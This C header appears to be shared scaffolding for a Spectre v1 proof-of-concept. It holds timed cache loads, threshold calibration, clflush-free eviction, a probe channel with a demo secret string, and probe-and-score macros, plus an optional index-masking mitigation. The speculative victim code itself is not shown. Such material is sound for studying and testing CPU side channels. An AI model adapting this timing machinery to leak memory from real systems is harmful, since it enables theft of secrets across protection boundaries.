/*
 * Spectre v1 proof-of-concept scaffolding: cycle-accurate timed loads,
 * threshold calibration, cache-flush fallbacks for pre-SSE2 CPUs, and the
 * shared option-parsing / measurement macros (__OCTOPUS_*) expanded by the
 * individual PoC drivers.
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <x86intrin.h>

#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif

/* Pre-SSE2 CPUs have no rdtscp, no mfence and no clflush; fall back to the
 * plain-rdtsc timing path and SSE streaming-store eviction. */
#if defined(__SSE__) && !defined(__SSE2__)
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#define LATENCY (18 + 18)
#endif

/* Timer overhead subtracted from each raw measurement: a pair of rdtscp
 * reads, or a pair of mfence-serialized rdtsc reads.  The value MUST be
 * parenthesized: with the bare form `42 + 42`, the expression
 * `t1 - t0 - LATENCY` in timed_access() would expand to
 * `t1 - t0 - 42 + 42`, cancelling the correction entirely. */
#ifndef LATENCY
#ifndef NORDTSCP
#define LATENCY (42 + 42)	/* two rdtscp reads */
#else
#ifndef NOMFENCE
#define LATENCY (18 + 18)	/* two mfence+rdtsc sequences */
#endif
#endif
#endif

#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
 *
 * array_index_mask_nospec() - generate a mask that is ~0UL when the
 * bounds check succeeds and 0 otherwise
 * @index: array element index
 * @size: number of elements in array
 *
 * Returns:
 * 0 - (index < size)
 */
static inline unsigned long array_index_mask_nospec(unsigned long index,
		unsigned long size)
{
	unsigned long mask;

	/* cmp sets CF when index < size; sbb then yields all-ones (mask
	 * ~0UL) in that case and 0 otherwise — branchless, so it cannot be
	 * speculated past. */
	__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
			:"=r" (mask)
			:"g"(size),"r" (index)
			:"cc");
	return mask;
}
#endif /* MASKING_MITIGATION */

#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096

uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];

/*
 * Evict the cache lines starting at `addr` without clflush, by covering
 * 256 bytes with non-temporal (streaming) SSE stores, which bypass the
 * cache hierarchy.  `addr` must be 16-byte aligned for _mm_stream_ps.
 * Fix: the original called the nonexistent intrinsic `_mm_stderr_ps`;
 * the streaming store is `_mm_stream_ps`.
 */
void flush_memory_sse(uint8_t * addr)
{
	float* p = (float *)addr;
	float c = 0.f;
	__m128 i = _mm_setr_ps(c, c, c, c);

	int k, l;
	/* Non-sequential memory addressing by looping through k by l */
	for (k = 0; k < 4; k++)
		for (l = 0; l < 4; l++)
			_mm_stream_ps(&p[(l * 4 + k) * 4], i);
}
#endif /* NOCLFLUSH */

/* Spacing between probe slots; one slot per possible byte value keeps
 * probes on distinct cache lines (and defeats adjacent-line prefetch). */
#define GAP 512

char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";

unsigned int cache_hit_threshold, array1_size = 16;
uint8_t unused1[64], unused2[64], array1[160] = {
	1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16
};
uint8_t channel[256 * GAP]; /* side channel to extract secret phrase */

/* Shared getopt(3) option handling for the PoC drivers.  Expects
 * `int o, json;` plus `argc`/`argv` in the expanding scope; returns 1
 * from the enclosing function on usage errors. */
#define __OCTOPUS_ARGS__\
	while ((o = getopt(argc, argv, "t:j")) != EOF) {\
		switch (o) {\
		case 't':\
			cache_hit_threshold = atoi(optarg);\
			break;\
		case 'j':\
			json++;\
			break;\
		default:\
		usage:\
			fprintf(stderr, "usage: %s [-j] "\
					"[-t threshold]\n"\
					"\t-j\t\tJSON output\n"\
					"\t-t INT\t\tfixed threshold\n", argv[0]);\
			return 1;\
		}\
	}\
	if (argc != optind) {\
		goto usage;\
	}

/* Shared probe loop: time a read of every channel slot, score cache hits,
 * and break out of the enclosing loop once a clear winner emerges.
 * Expects `i, mix_i, j, tries`, `results[256]` and `addr` in scope. */
#define __OCTOPUS_TIMINGS__\
	/* Time reads. Order is lightly mixed up to prevent stride prediction */\
	for (i = 0; i < 256; i++) {\
		mix_i = ((i * 167) + 13) & 255;\
		addr = & channel[mix_i * GAP];\
		if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {\
			results[mix_i]++; /* cache hit - add +1 to score for this value */\
		}\
	}\
	/* Locate highest results in j */\
	j = -1;\
	for (i = 0; i < 256; i++) {\
		if (j < 0 || results[i] >= results[j]) {\
			j = i;\
		}\
	}\
	if (results[j] >= 3) {\
		break;\
	}

#define __OCTOPUS_NOCLFLUSH_INIT__\
	int junk2 = 0;\
	int l;\
	(void)junk2;

/* Optional serializing fence for the probe loops.  NOTE: the original
 * placed `#ifndef NOMFENCE` INSIDE the macro replacement list, which is
 * invalid C — preprocessor directives cannot appear in a macro body.
 * Select the definition conditionally instead, so the macro expands to
 * `_mm_mfence();` or to nothing. */
#ifndef NOMFENCE
#define __OCTOPUS_MFENCE__ _mm_mfence();
#else
#define __OCTOPUS_MFENCE__
#endif

/*
 * Read one byte through `addr` and return the access time in cycles,
 * with the fixed timer overhead (LATENCY) subtracted.  Uses rdtscp when
 * available, otherwise mfence-bracketed rdtsc, otherwise bare rdtsc.
 * Result may wrap (unsigned) when the access is faster than LATENCY.
 */
static inline unsigned timed_access(volatile uint8_t *addr)
{
	uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
	/* Self-assignment silences -Wuninitialized; `junk` only exists to
	 * force the load and serialize against the timer reads. */
	unsigned int junk = junk;
#ifndef NORDTSCP
	t0 = __rdtscp(& junk);
	junk |= *addr;
	t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
	/*
	Since the rdstc instruction isn't serialized, newer processors will try to
	reorder it, ruining its value as a timing mechanism.
	To get around this, we use the mfence instruction to introduce a memory
	barrier and force serialization. mfence is used because it is portable across
	Intel and AMD.
	*/
	_mm_mfence();
	t0 = __rdtsc();
	_mm_mfence();
	junk = *addr;
	_mm_mfence();
	t1 = __rdtsc();
	_mm_mfence();
#else
	/*
	The mfence instruction was introduced with the SSE2 instruction set, so
	we have to ifdef it out on pre-SSE2 processors.
	Luckily, these older processors don't seem to reorder the rdtsc instruction,
	so not having mfence on older processors is less of an issue.
	*/
	t0 = __rdtsc();
	junk |= *addr;
	t1 = __rdtsc();
#endif /* NOMFENCE */
#endif /* NORDTSCP */
	return (unsigned)(t1 - t0 - LATENCY);
}

/*
 * Estimate the cache-hit threshold: repeatedly time a load of a known-hot,
 * cacheline-aligned local buffer and average over `cnt` runs.  The average
 * hit time plus LATENCY headroom is written to *threshold (ignored when
 * threshold is NULL).
 */
static void calibrate_threshold(unsigned int *threshold)
{
	volatile char buf[2 * CACHELINE_SIZE];
	volatile uint8_t* bufp;
	int i;
	const int cnt = 10000;
	uint64_t tcache = 0;
	__attribute__((unused)) volatile int junk = 0;

	/* Round up into the buffer so the probe address is aligned to a
	 * cache line boundary. */
	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
			~(CACHELINE_SIZE - 1)));

	junk |= *bufp; /* prime the line so every timed access is a hit */

	for (i = 0, tcache = 0; i < cnt; i++) {
		tcache += timed_access(bufp);
	}
	tcache = tcache / cnt;

	if (threshold != NULL) {
		*threshold = tcache + LATENCY;
	}

	return;
}